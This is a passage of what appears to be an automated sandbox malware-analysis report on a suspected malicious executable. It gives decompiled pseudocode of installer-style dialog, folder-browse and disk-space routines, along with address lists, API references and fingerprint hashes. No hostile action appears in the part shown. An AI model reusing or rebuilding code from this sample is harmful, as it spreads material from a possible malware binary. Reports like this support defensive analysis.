											_t281 = _t142;
											do {
												_t202 =  *((intOrPtr*)(_v32 + _v16 * 4));
												__eflags = _t202 - _t315;
												if(_t202 != _t315) {
													_t291 =  *_t281;
													_v68 = _t202;
													__eflags = _t291 & 0x00000001;
													_v72 = 8;
													if((_t291 & 0x00000001) != 0) {
														_t151 =  &(_t281[4]); // 0x6c0034
														_v72 = 9;
														_v56 = _t151;
														_t154 =  &(_t281[0]);
														 *_t154 = _t281[0] & 0x000000fe;
														__eflags =  *_t154;
													}
													__eflags = _t291 & 0x00000040;
													if((_t291 & 0x00000040) == 0) {
														_t206 = (_t291 & 0x00000001) + 1;
														__eflags = _t291 & 0x00000010;
														if((_t291 & 0x00000010) != 0) {
															_t206 = _t206 + 3;
															__eflags = _t206;
														}
													} else {
														_t206 = 3;
													}
													_t294 = (_t291 >> 0x00000005 & 0x00000001) + 1;
													__eflags = _t294;
													_v64 = (_t206 << 0x0000000b | _t291 & 0x00000008) + (_t206 << 0x0000000b | _t291 & 0x00000008) | _t291 & 0x00000020;
													SendMessageA(_v8, 0x1102, _t294, _v68);
													SendMessageA(_v8, 0x110d, _t315,  &_v72);
												}
												_v16 = _v16 + 1;
												_t281 =  &(_t281[0x106]);
												__eflags = _v16 -  *0x42eb8c; // 0x2
											} while (__eflags < 0);
											goto L84;
										}
									} else {
										_t282 = E004012E2( *0x429fcc);
										E00401299(_t282);
										_t217 = 0;
										_t289 = 0;
										__eflags = _t282 - _t315;
										if(_t282 <= _t315) {
											L72:
											SendMessageA(_v12, 0x14e, _t289, _t315);
											_a16 = _t282;
											_a8 = 0x420;
											goto L73;
										} else {
											goto L69;
										}
										do {
											L69:
											_t309 = _v20;
											__eflags =  *((intOrPtr*)(_t309 + _t217 * 4)) - _t315;
											if( *((intOrPtr*)(_t309 + _t217 * 4)) != _t315) {
												_t289 = _t289 + 1;
												__eflags = _t289;
											}
											_t217 = _t217 + 1;
											__eflags = _t217 - _t282;
										} while (_t217 < _t282);
										goto L72;
									}
								}
							}
							__eflags = _a12 - 0x3f9;
							if(_a12 != 0x3f9) {
								goto L89;
							}
							__eflags = _a12 >> 0x10 - 1;
							if(_a12 >> 0x10 != 1) {
								goto L89;
							}
							_t227 = SendMessageA(_v12, 0x147, _t315, _t315);
							__eflags = _t227 - 0xffffffff;
							if(_t227 == 0xffffffff) {
								goto L89;
							}
							_t283 = SendMessageA(_v12, 0x150, _t227, _t315);
							__eflags = _t283 - 0xffffffff;
							if(_t283 == 0xffffffff) {
								L54:
								_t283 = 0x20;
								L55:
								E00401299(_t283);
								SendMessageA(_a4, 0x420, _t315, _t283);
								_a12 = 1;
								_a16 = _t315;
								_a8 = 0x40f;
								goto L56;
							}
							_t231 = _v20;
							__eflags =  *((intOrPtr*)(_t231 + _t283 * 4)) - _t315;
							if( *((intOrPtr*)(_t231 + _t283 * 4)) != _t315) {
								goto L55;
							}
							goto L54;
						}
						goto L28;
					}
				} else {
					 *0x42ebc0 = _a4;
					_t247 =  *0x42eb8c; // 0x2
					_t285 = 2;
					_v28 = 0;
					_v16 = _t285;
					 *0x429fcc = GlobalAlloc(0x40, _t247 << 2);
					_t250 = LoadBitmapA( *0x42eb60, 0x6e);
					 *0x429fc0 =  *0x429fc0 | 0xffffffff;
					_v24 = _t250;
					 *0x429fc8 = SetWindowLongA(_v8, 0xfffffffc, E00404C19);
					_t252 = ImageList_Create(0x10, 0x10, 0x21, 6, 0);
					 *0x429fb4 = _t252;
					ImageList_AddMasked(_t252, _v24, 0xff00ff);
					SendMessageA(_v8, 0x1109, _t285,  *0x429fb4);
					if(SendMessageA(_v8, 0x111c, 0, 0) < 0x10) {
						SendMessageA(_v8, 0x111b, 0x10, 0);
					}
					DeleteObject(_v24);
					_t286 = 0;
					do {
						_t258 =  *((intOrPtr*)(_v20 + _t286 * 4));
						if( *((intOrPtr*)(_v20 + _t286 * 4)) != _t315) {
							if(_t286 != 0x20) {
								_v16 = _t315;
							}
							SendMessageA(_v12, 0x151, SendMessageA(_v12, 0x143, _t315, E0040594D(_t286, _t315, _t320, _t315, _t258)), _t286);
						}
						_t286 = _t286 + 1;
					} while (_t286 < 0x21);
					_t317 = _a16;
					_t287 = _v16;
					_push( *((intOrPtr*)(_t317 + 0x30 + _t287 * 4)));
					_push(0x15);
					E00403CDD(_a4);
					_push( *((intOrPtr*)(_t317 + 0x34 + _t287 * 4)));
					_push(0x16);
					E00403CDD(_a4);
					_t318 = 0;
					_t288 = 0;
					_t328 =  *0x42eb8c - _t318; // 0x2
					if(_t328 <= 0) {
						L19:
						SetWindowLongA(_v8, 0xfffffff0, GetWindowLongA(_v8, 0xfffffff0) & 0x000000fb);
						goto L20;
					} else {
						_t311 = _v32 + 8;
						_v24 = _t311;
						do {
							_t268 = _t311 + 0x10;
							if( *_t268 != 0) {
								_v60 = _t268;
								_t269 =  *_t311;
								_t302 = 0x20;
								_v84 = _t288;
								_v80 = 0xffff0002;
								_v76 = 0xd;
								_v64 = _t302;
								_v40 = _t318;
								_v68 = _t269 & _t302;
								if((_t269 & 0x00000002) == 0) {
									__eflags = _t269 & 0x00000004;
									if((_t269 & 0x00000004) == 0) {
										 *( *0x429fcc + _t318 * 4) = SendMessageA(_v8, 0x1100, 0,  &_v84);
									} else {
										_t288 = SendMessageA(_v8, 0x110a, 3, _t288);
									}
								} else {
									_v76 = 0x4d;
									_v44 = 1;
									_t274 = SendMessageA(_v8, 0x1100, 0,  &_v84);
									_v28 = 1;
									 *( *0x429fcc + _t318 * 4) = _t274;
									_t288 =  *( *0x429fcc + _t318 * 4);
								}
							}
							_t318 = _t318 + 1;
							_t311 = _v24 + 0x418;
							_t331 = _t318 -  *0x42eb8c; // 0x2
							_v24 = _t311;
						} while (_t331 < 0);
						if(_v28 != 0) {
							L20:
							if(_v16 != 0) {
								E00403D12(_v8);
								_t280 = _v32;
								_t315 = 0;
								__eflags = 0;
								goto L23;
							} else {
								ShowWindow(_v12, 5);
								E00403D12(_v12);
								L89:
								return E00403D44(_a8, _a12, _a16);
							}
						}
						goto L19;
					}
				}
			}






































































                    0x00404636
                    0x0040463c
                    0x0040463e
                    0x00404644
                    0x0040464a
                    0x0040464d
                    0x00404657
                    0x00404660
                    0x00404663
                    0x00404666
                    0x0040488e
                    0x0040488e
                    0x00404895
                    0x004048a9
                    0x00404897
                    0x00404899
                    0x0040489c
                    0x0040489d
                    0x004048a4
                    0x004048a4
                    0x004048ac
                    0x004048b5
                    0x004048c0
                    0x004048c0
                    0x004048c3
                    0x004048c6
                    0x004048d5
                    0x004048d5
                    0x004048dc
                    0x00404954
                    0x00404954
                    0x00404957
                    0x00404959
                    0x0040495c
                    0x00404963
                    0x00404971
                    0x00404971
                    0x00404973
                    0x00404976
                    0x0040497d
                    0x0040497f
                    0x00404983
                    0x004049a0
                    0x004049a4
                    0x004049a4
                    0x00404985
                    0x00404992
                    0x00404992
                    0x00404983
                    0x0040497d
                    0x00000000
                    0x00404957
                    0x004048de
                    0x004048e1
                    0x004048ec
                    0x004048ee
                    0x004048f1
                    0x004048f8
                    0x004048fd
                    0x004048ff
                    0x00404909
                    0x00404909
                    0x0040490d
                    0x0040490f
                    0x00404912
                    0x00404914
                    0x00404917
                    0x0040492d
                    0x0040492d
                    0x00404919
                    0x00404919
                    0x0040491f
                    0x00404921
                    0x00404928
                    0x00404923
                    0x00404923
                    0x00404923
                    0x00404921
                    0x00404931
                    0x00404933
                    0x00404938
                    0x00404941
                    0x00404942
                    0x0040494c
                    0x0040494c
                    0x0040494e
                    0x00404951
                    0x00404951
                    0x00404912
                    0x00000000
                    0x004048ff
                    0x004048e3
                    0x004048e6
                    0x004048ea
                    0x00000000
                    0x00000000
                    0x00000000
                    0x004048ea
                    0x004048c8
                    0x004048cf
                    0x00000000
                    0x00000000
                    0x00000000
                    0x004048b7
                    0x004048b7
                    0x004048ba
                    0x004049a7
                    0x004049a7
                    0x004049ae
                    0x00404a22
                    0x00404a22
                    0x00404a29
                    0x00404a35
                    0x00404a35
                    0x00404a37
                    0x00404a3e
                    0x00404a40
                    0x00404a45
                    0x00404a47
                    0x00404a4a
                    0x00404a4a
                    0x00404a50
                    0x00404a55
                    0x00404a57
                    0x00404a5a
                    0x00404a5a
                    0x00404a60
                    0x00404a66
                    0x00404a6c
                    0x00404a6c
                    0x00404a72
                    0x00404a79
                    0x00404bc6
                    0x00404bc6
                    0x00404bcd
                    0x00404bcf
                    0x00404bd6
                    0x00404bda
                    0x00404be7
                    0x00404be7
                    0x00404bea
                    0x00404bf0
                    0x00404c02
                    0x00404c02
                    0x00404bd6
                    0x00000000
                    0x00404a7f
                    0x00404a81
                    0x00404a86
                    0x00404a89
                    0x00404a8d
                    0x00404a8d
                    0x00404a92
                    0x00404a95
                    0x00404ad6
                    0x00404ad8
                    0x00404ae2
                    0x00404ae8
                    0x00404aeb
                    0x00404af0
                    0x00404af7
                    0x00404afa
                    0x00404b9c
                    0x00404ba2
                    0x00404ba8
                    0x00404bad
                    0x00404bb0
                    0x00404bc1
                    0x00404bc1
                    0x00000000
                    0x00404b00
                    0x00404b00
                    0x00404b00
                    0x00404b03
                    0x00404b09
                    0x00404b0c
                    0x00404b0e
                    0x00404b10
                    0x00404b12
                    0x00404b15
                    0x00404b18
                    0x00404b1f
                    0x00404b21
                    0x00404b24
                    0x00404b2b
                    0x00404b2e
                    0x00404b2e
                    0x00404b2e
                    0x00404b2e
                    0x00404b32
                    0x00404b35
                    0x00404b41
                    0x00404b42
                    0x00404b45
                    0x00404b47
                    0x00404b47
                    0x00404b47
                    0x00404b37
                    0x00404b39
                    0x00404b39
                    0x00404b66
                    0x00404b66
                    0x00404b67
                    0x00404b73
                    0x00404b82
                    0x00404b82
                    0x00404b84
                    0x00404b87
                    0x00404b90
                    0x00404b90
                    0x00000000
                    0x00404b03
                    0x00404a97
                    0x00404aa2
                    0x00404aa5
                    0x00404aaa
                    0x00404aac
                    0x00404aae
                    0x00404ab0
                    0x00404ac0
                    0x00404aca
                    0x00404acc
                    0x00404acf
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00404ab2
                    0x00404ab2
                    0x00404ab2
                    0x00404ab5
                    0x00404ab8
                    0x00404aba
                    0x00404aba
                    0x00404aba
                    0x00404abb
                    0x00404abc
                    0x00404abc
                    0x00000000
                    0x00404ab2
                    0x00404a95
                    0x00404a79
                    0x004049b0
                    0x004049b6
                    0x00000000
                    0x00000000
                    0x004049c2
                    0x004049c6
                    0x00000000
                    0x00000000
                    0x004049d6
                    0x004049d8
                    0x004049db
                    0x00000000
                    0x00000000
                    0x004049ed
                    0x004049ef
                    0x004049f2
                    0x004049fc
                    0x004049fe
                    0x004049ff
                    0x00404a00
                    0x00404a0f
                    0x00404a11
                    0x00404a18
                    0x00404a1b
                    0x00000000
                    0x00404a1b
                    0x004049f4
                    0x004049f7
                    0x004049fa
                    0x00000000
                    0x00000000
                    0x00000000
                    0x004049fa
                    0x00000000
                    0x004048ba
                    0x0040466c
                    0x00404671
                    0x00404676
                    0x0040467b
                    0x0040467c
                    0x00404685
                    0x00404690
                    0x0040469b
                    0x004046a1
                    0x004046af
                    0x004046c4
                    0x004046c9
                    0x004046d4
                    0x004046dd
                    0x004046f2
                    0x00404703
                    0x00404710
                    0x00404710
                    0x00404715
                    0x0040471b
                    0x0040471d
                    0x00404720
                    0x00404725
                    0x0040472a
                    0x0040472c
                    0x0040472c
                    0x0040474c
                    0x0040474c
                    0x0040474e
                    0x0040474f
                    0x00404754
                    0x00404757
                    0x0040475a
                    0x0040475e
                    0x00404763
                    0x00404768
                    0x0040476c
                    0x00404771
                    0x00404776
                    0x00404778
                    0x0040477a
                    0x00404780
                    0x0040484a
                    0x0040485d
                    0x00000000
                    0x00404786
                    0x00404789
                    0x0040478c
                    0x0040478f
                    0x0040478f
                    0x00404795
                    0x0040479b
                    0x0040479e
                    0x004047a4
                    0x004047a5
                    0x004047aa
                    0x004047b3
                    0x004047ba
                    0x004047bd
                    0x004047c0
                    0x004047c3
                    0x004047fd
                    0x004047ff
                    0x00404828
                    0x00404801
                    0x0040480e
                    0x0040480e
                    0x004047c5
                    0x004047c8
                    0x004047d7
                    0x004047e1
                    0x004047e9
                    0x004047f0
                    0x004047f8
                    0x004047f8
                    0x004047c3
                    0x0040482e
                    0x0040482f
                    0x00404835
                    0x0040483b
                    0x0040483b
                    0x00404848
                    0x00404863
                    0x00404867
                    0x00404884
                    0x00404889
                    0x0040488c
                    0x0040488c
                    0x00000000
                    0x00404869
                    0x0040486e
                    0x00404877
                    0x00404c04
                    0x00404c16
                    0x00404c16
                    0x00404867
                    0x00000000
                    0x00404848
                    0x00404780

                    APIs
                    • GetDlgItem.USER32 ref: 0040462F
                    • GetDlgItem.USER32 ref: 0040463C
                    • GlobalAlloc.KERNEL32(00000040,00000002), ref: 00404688
                    • LoadBitmapA.USER32 ref: 0040469B
                    • SetWindowLongA.USER32(?,000000FC,00404C19), ref: 004046B5
                    • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 004046C9
                    • ImageList_AddMasked.COMCTL32(00000000,?,00FF00FF), ref: 004046DD
                    • SendMessageA.USER32(?,00001109,00000002), ref: 004046F2
                    • SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 004046FE
                    • SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 00404710
                    • DeleteObject.GDI32(?), ref: 00404715
                    • SendMessageA.USER32(?,00000143,00000000,00000000), ref: 00404740
                    • SendMessageA.USER32(?,00000151,00000000,00000000), ref: 0040474C
                    • SendMessageA.USER32(?,00001100,00000000,?), ref: 004047E1
                    • SendMessageA.USER32(?,0000110A,00000003,00000000), ref: 0040480C
                    • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404820
                    • GetWindowLongA.USER32 ref: 0040484F
                    • SetWindowLongA.USER32(?,000000F0,00000000), ref: 0040485D
                    • ShowWindow.USER32(?,00000005), ref: 0040486E
                    • SendMessageA.USER32(?,00000419,00000000,?), ref: 00404971
                    • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 004049D6
                    • SendMessageA.USER32(?,00000150,00000000,00000000), ref: 004049EB
                    • SendMessageA.USER32(?,00000420,00000000,00000020), ref: 00404A0F
                    • SendMessageA.USER32(?,00000200,00000000,00000000), ref: 00404A35
                    • ImageList_Destroy.COMCTL32(?), ref: 00404A4A
                    • GlobalFree.KERNEL32 ref: 00404A5A
                    • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00404ACA
                    • SendMessageA.USER32(?,00001102,00000410,?), ref: 00404B73
                    • SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 00404B82
                    • InvalidateRect.USER32(?,00000000,00000001), ref: 00404BA2
                    • ShowWindow.USER32(?,00000000), ref: 00404BF0
                    • GetDlgItem.USER32 ref: 00404BFB
                    • ShowWindow.USER32(00000000), ref: 00404C02
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.293500532.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.293492940.0000000000400000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.293514085.0000000000407000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.293540080.0000000000409000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.293963975.000000000042C000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.294066816.0000000000434000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.294188478.0000000000437000.00000002.00020000.sdmp Download File
                    Similarity
                    • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                    • String ID: $M$N
                    • API String ID: 1638840714-813528018
                    • Opcode ID: f6787f79de443932d2fc7b26f3aa5085de6bf6d711a4170b7836f229e80d056d
                    • Instruction ID: c130209c976f96ebc92895edf0e38420b46f59adec9cf70198d20430cf8fc3c6
                    • Opcode Fuzzy Hash: f6787f79de443932d2fc7b26f3aa5085de6bf6d711a4170b7836f229e80d056d
                    • Instruction Fuzzy Hash: 1E02AEB0A00209AFDB20DF95DD45AAE7BB5FB84314F10817AF611BA2E1C7789D42CF58
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0040411B, Relevance: 23.0, APIs: 10, Strings: 3, Instructions: 266stringCOMMON
                    Download Yara Rule
                    C-Code - Quality: 78%
                    			E0040411B(struct HWND__* _a4, signed int _a8, unsigned int _a12, intOrPtr _a16) {
				signed int _v8;
				struct HWND__* _v12;
				long _v16;
				long _v20;
				char _v24;
				long _v28;
				char _v32;
				intOrPtr _v36;
				long _v40;
				signed int _v44;
				CHAR* _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				CHAR* _v68;
				void _v72;
				char _v76;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t81;
				long _t86;
				signed char* _t88;
				void* _t94;
				signed int _t95;
				signed short _t113;
				signed int _t117;
				char* _t122;
				intOrPtr _t124;
				intOrPtr* _t138;
				signed int* _t145;
				intOrPtr _t147;
				signed int _t148;
				signed int _t153;
				struct HWND__* _t159;
				CHAR* _t162;
				int _t163;

				_t81 =  *0x4297a8;
				_v36 = _t81;
				_t162 = ( *(_t81 + 0x3c) << 0xa) + 0x42f000;
				_v8 =  *((intOrPtr*)(_t81 + 0x38));
				if(_a8 == 0x40b) {
					E004051D0(0x3fb, _t162);
					E00405B89(_t162);
				}
				if(_a8 != 0x110) {
					L8:
					if(_a8 != 0x111) {
						L20:
						if(_a8 == 0x40f) {
							L22:
							_v8 = _v8 & 0x00000000;
							_v12 = _v12 & 0x00000000;
							E004051D0(0x3fb, _t162);
							if(E004054FF(_t180, _t162) == 0) {
								_v8 = 1;
							}
							E0040592B(0x428fa0, _t162);
							_t145 = 0;
							_t86 = E00405C49(0);
							_v16 = _t86;
							if(_t86 == 0) {
								L31:
								E0040592B(0x428fa0, _t162);
								_t88 = E004054B2(0x428fa0);
								if(_t88 != _t145) {
									 *_t88 =  *_t88 & 0x00000000;
								}
								if(GetDiskFreeSpaceA(0x428fa0,  &_v20,  &_v28,  &_v16,  &_v40) == 0) {
									_t153 = _a8;
									goto L37;
								} else {
									_t163 = 0x400;
									_t153 = MulDiv(_v20 * _v28, _v16, 0x400);
									_v12 = 1;
									goto L38;
								}
							} else {
								if(0 == 0x428fa0) {
									L30:
									_t145 = 0;
									goto L31;
								} else {
									goto L26;
								}
								while(1) {
									L26:
									_t113 = _v16(0x428fa0,  &_v44,  &_v24,  &_v32);
									if(_t113 != 0) {
										break;
									}
									if(_t145 != 0) {
										 *_t145 =  *_t145 & _t113;
									}
									_t145 = E00405465(0x428fa0) - 1;
									 *_t145 = 0x5c;
									if(_t145 != 0x428fa0) {
										continue;
									} else {
										goto L30;
									}
								}
								_t153 = (_v40 << 0x00000020 | _v44) >> 0xa;
								_v12 = 1;
								_t145 = 0;
								L37:
								_t163 = 0x400;
								L38:
								_t94 = E0040456B(5);
								if(_v12 != _t145 && _t153 < _t94) {
									_v8 = 2;
								}
								_t147 =  *0x42e33c; // 0x6c4e95
								if( *((intOrPtr*)(_t147 + 0x10)) != _t145) {
									E004044B6(0x3ff, 0xfffffffb, _t94);
									if(_v12 == _t145) {
										SetDlgItemTextA(_a4, _t163, 0x428f90);
									} else {
										E004044B6(_t163, 0xfffffffc, _t153);
									}
								}
								_t95 = _v8;
								 *0x42ec04 = _t95;
								if(_t95 == _t145) {
									_v8 = E0040140B(7);
								}
								if(( *(_v36 + 0x14) & _t163) != 0) {
									_v8 = _t145;
								}
								E00403CFF(0 | _v8 == _t145);
								if(_v8 == _t145 &&  *0x429fc4 == _t145) {
									E004040B0();
								}
								 *0x429fc4 = _t145;
								goto L53;
							}
						}
						_t180 = _a8 - 0x405;
						if(_a8 != 0x405) {
							goto L53;
						}
						goto L22;
					}
					_t117 = _a12 & 0x0000ffff;
					if(_t117 != 0x3fb) {
						L12:
						if(_t117 == 0x3e9) {
							_t148 = 7;
							memset( &_v72, 0, _t148 << 2);
							_v76 = _a4;
							_v68 = 0x429fd8;
							_v56 = E00404450;
							_v52 = _t162;
							_v64 = E0040594D(0x3fb, 0x429fd8, _t162, 0x4293a8, _v8);
							_t122 =  &_v76;
							_v60 = 0x41;
							__imp__SHBrowseForFolderA(_t122);
							if(_t122 == 0) {
								_a8 = 0x40f;
							} else {
								__imp__CoTaskMemFree(_t122);
								E0040541E(_t162);
								_t124 =  *0x42eb70; // 0x6bfe70
								_t125 =  *((intOrPtr*)(_t124 + 0x11c));
								if( *((intOrPtr*)(_t124 + 0x11c)) != 0 && _t162 == "C:\\Users\\hardz\\AppData\\Local\\Temp") {
									E0040594D(0x3fb, 0x429fd8, _t162, 0, _t125);
									if(lstrcmpiA(0x42db00, 0x429fd8) != 0) {
										lstrcatA(_t162, 0x42db00);
									}
								}
								 *0x429fc4 =  &(( *0x429fc4)[0]);
								SetDlgItemTextA(_a4, 0x3fb, _t162);
							}
						}
						goto L20;
					}
					if(_a12 >> 0x10 != 0x300) {
						goto L53;
					}
					_a8 = 0x40f;
					goto L12;
				} else {
					_t159 = _a4;
					_v12 = GetDlgItem(_t159, 0x3fb);
					if(E0040548B(_t162) != 0 && E004054B2(_t162) == 0) {
						E0040541E(_t162);
					}
					 *0x42e338 = _t159;
					SetWindowTextA(_v12, _t162);
					_push( *((intOrPtr*)(_a16 + 0x34)));
					_push(1);
					E00403CDD(_t159);
					_push( *((intOrPtr*)(_a16 + 0x30)));
					_push(0x14);
					E00403CDD(_t159);
					E00403D12(_v12);
					_t138 = E00405C49(7);
					if(_t138 == 0) {
						L53:
						return E00403D44(_a8, _a12, _a16);
					}
					 *_t138(_v12, 1);
					goto L8;
				}
			}








































                    0x00404121
                    0x00404128
                    0x00404134
                    0x00404142
                    0x0040414a
                    0x0040414e
                    0x00404154
                    0x00404154
                    0x00404160
                    0x004041d4
                    0x004041db
                    0x004042b0
                    0x004042b7
                    0x004042c6
                    0x004042c6
                    0x004042ca
                    0x004042d0
                    0x004042dd
                    0x004042df
                    0x004042df
                    0x004042ed
                    0x004042f2
                    0x004042f5
                    0x004042fc
                    0x004042ff
                    0x00404336
                    0x00404338
                    0x0040433e
                    0x00404345
                    0x00404347
                    0x00404347
                    0x00404363
                    0x0040439f
                    0x00000000
                    0x00404365
                    0x00404368
                    0x0040437c
                    0x0040437e
                    0x00000000
                    0x0040437e
                    0x00404301
                    0x00404305
                    0x00404334
                    0x00404334
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00404307
                    0x00404307
                    0x00404314
                    0x00404319
                    0x00000000
                    0x00000000
                    0x0040431d
                    0x0040431f
                    0x0040431f
                    0x0040432a
                    0x0040432d
                    0x00404332
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00404332
                    0x0040438d
                    0x00404394
                    0x0040439b
                    0x004043a2
                    0x004043a2
                    0x004043a7
                    0x004043a9
                    0x004043b1
                    0x004043b7
                    0x004043b7
                    0x004043be
                    0x004043c7
                    0x004043d1
                    0x004043d9
                    0x004043ef
                    0x004043db
                    0x004043df
                    0x004043df
                    0x004043d9
                    0x004043f4
                    0x004043f9
                    0x004043fe
                    0x00404407
                    0x00404407
                    0x00404410
                    0x00404412
                    0x00404412
                    0x0040441e
                    0x00404426
                    0x00404430
                    0x00404430
                    0x00404435
                    0x00000000
                    0x00404435
                    0x004042ff
                    0x004042b9
                    0x004042c0
                    0x00000000
                    0x00000000
                    0x00000000
                    0x004042c0
                    0x004041e1
                    0x004041e7
                    0x00404201
                    0x00404206
                    0x00404210
                    0x00404217
                    0x00404226
                    0x00404229
                    0x0040422c
                    0x00404233
                    0x0040423b
                    0x0040423e
                    0x00404242
                    0x00404249
                    0x00404251
                    0x004042a9
                    0x00404253
                    0x00404254
                    0x0040425b
                    0x00404260
                    0x00404265
                    0x0040426d
                    0x0040427a
                    0x0040428e
                    0x00404292
                    0x00404292
                    0x0040428e
                    0x00404297
                    0x004042a2
                    0x004042a2
                    0x00404251
                    0x00000000
                    0x00404206
                    0x004041f4
                    0x00000000
                    0x00000000
                    0x004041fa
                    0x00000000
                    0x00404162
                    0x00404162
                    0x0040416e
                    0x00404178
                    0x00404185
                    0x00404185
                    0x0040418b
                    0x00404194
                    0x0040419d
                    0x004041a0
                    0x004041a3
                    0x004041ab
                    0x004041ae
                    0x004041b1
                    0x004041b9
                    0x004041c0
                    0x004041c7
                    0x0040443b
                    0x0040444d
                    0x0040444d
                    0x004041d2
                    0x00000000
                    0x004041d2

                    APIs
                    • GetDlgItem.USER32 ref: 00404167
                    • SetWindowTextA.USER32(?,?), ref: 00404194
                    • SHBrowseForFolderA.SHELL32(?,004293A8,?), ref: 00404249
                    • CoTaskMemFree.OLE32(00000000), ref: 00404254
                    • lstrcmpiA.KERNEL32(qdrjldxxem,00429FD8,00000000,?,?), ref: 00404286
                    • lstrcatA.KERNEL32(?,qdrjldxxem), ref: 00404292
                    • SetDlgItemTextA.USER32 ref: 004042A2
                      • Part of subcall function 004051D0: GetDlgItemTextA.USER32 ref: 004051E3
                      • Part of subcall function 00405B89: CharNextA.USER32(?,*?|<>/":,00000000,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\U001P56ybm.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004030BB,C:\Users\user\AppData\Local\Temp\,00000000,0040322D), ref: 00405BE1
                      • Part of subcall function 00405B89: CharNextA.USER32(?,?,?,00000000), ref: 00405BEE
                      • Part of subcall function 00405B89: CharNextA.USER32(?,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\U001P56ybm.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004030BB,C:\Users\user\AppData\Local\Temp\,00000000,0040322D), ref: 00405BF3
                      • Part of subcall function 00405B89: CharPrevA.USER32(?,?,"C:\Users\user\Desktop\U001P56ybm.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004030BB,C:\Users\user\AppData\Local\Temp\,00000000,0040322D), ref: 00405C03
                    • GetDiskFreeSpaceA.KERNEL32(00428FA0,?,?,0000040F,?,00428FA0,00428FA0,?,00000000,00428FA0,?,?,000003FB,?), ref: 0040435B
                    • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404376
                    • SetDlgItemTextA.USER32 ref: 004043EF
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.293500532.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.293492940.0000000000400000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.293514085.0000000000407000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.293540080.0000000000409000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.293963975.000000000042C000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.294066816.0000000000434000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.294188478.0000000000437000.00000002.00020000.sdmp Download File
                    Similarity
                    • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpi
                    • String ID: A$C:\Users\user\AppData\Local\Temp$qdrjldxxem
                    • API String ID: 2246997448-3988783955
                    • Opcode ID: 5b9bdf223cbd0333478b7b1187abfe1a1a1fc831b9bc42824364c4c8eca1df57
                    • Instruction ID: a19ed3a57cd3ea7516059bd6de19f3cb3834a8abb31794935fb739ca8bc8323d
                    • Opcode Fuzzy Hash: 5b9bdf223cbd0333478b7b1187abfe1a1a1fc831b9bc42824364c4c8eca1df57
                    • Instruction Fuzzy Hash: E09151B1A00218ABDB11DFA1DD85AEF7BB8EF84315F10407BFA04B62D1D77C99418B69
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0040594D, Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 195stringCOMMON
                    Download Yara Rule
                    C-Code - Quality: 74%
                    			E0040594D(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8) {
				signed int _v8;
				struct _ITEMIDLIST* _v12;
				signed int _v16;
				signed char _v20;
				signed char _v24;
				signed int _v28;
				signed int _t36;
				CHAR* _t37;
				signed char _t39;
				signed int _t40;
				int _t41;
				char _t51;
				char _t52;
				char _t54;
				char _t56;
				void* _t64;
				signed int _t68;
				intOrPtr _t72;
				signed int _t73;
				signed char _t74;
				intOrPtr _t77;
				char _t81;
				void* _t83;
				CHAR* _t84;
				void* _t86;
				signed int _t93;
				signed int _t95;
				void* _t96;

				_t86 = __esi;
				_t83 = __edi;
				_t64 = __ebx;
				_t36 = _a8;
				if(_t36 < 0) {
					_t77 =  *0x42e33c; // 0x6c4e95
					_t36 =  *(_t77 - 4 + _t36 * 4);
				}
				_t72 =  *0x42eb98; // 0x6c3bb4
				_t73 = _t72 + _t36;
				_t37 = 0x42db00;
				_push(_t64);
				_push(_t86);
				_push(_t83);
				_t84 = 0x42db00;
				if(_a4 - 0x42db00 < 0x800) {
					_t84 = _a4;
					_a4 = _a4 & 0x00000000;
				}
				while(1) {
					_t81 =  *_t73;
					if(_t81 == 0) {
						break;
					}
					__eflags = _t84 - _t37 - 0x400;
					if(_t84 - _t37 >= 0x400) {
						break;
					}
					_t73 = _t73 + 1;
					__eflags = _t81 - 0xfc;
					_a8 = _t73;
					if(__eflags <= 0) {
						if(__eflags != 0) {
							 *_t84 = _t81;
							_t84 =  &(_t84[1]);
							__eflags = _t84;
						} else {
							 *_t84 =  *_t73;
							_t84 =  &(_t84[1]);
							_t73 = _t73 + 1;
						}
						continue;
					}
					_t39 =  *(_t73 + 1);
					_t74 =  *_t73;
					_a8 = _a8 + 2;
					_v20 = _t39;
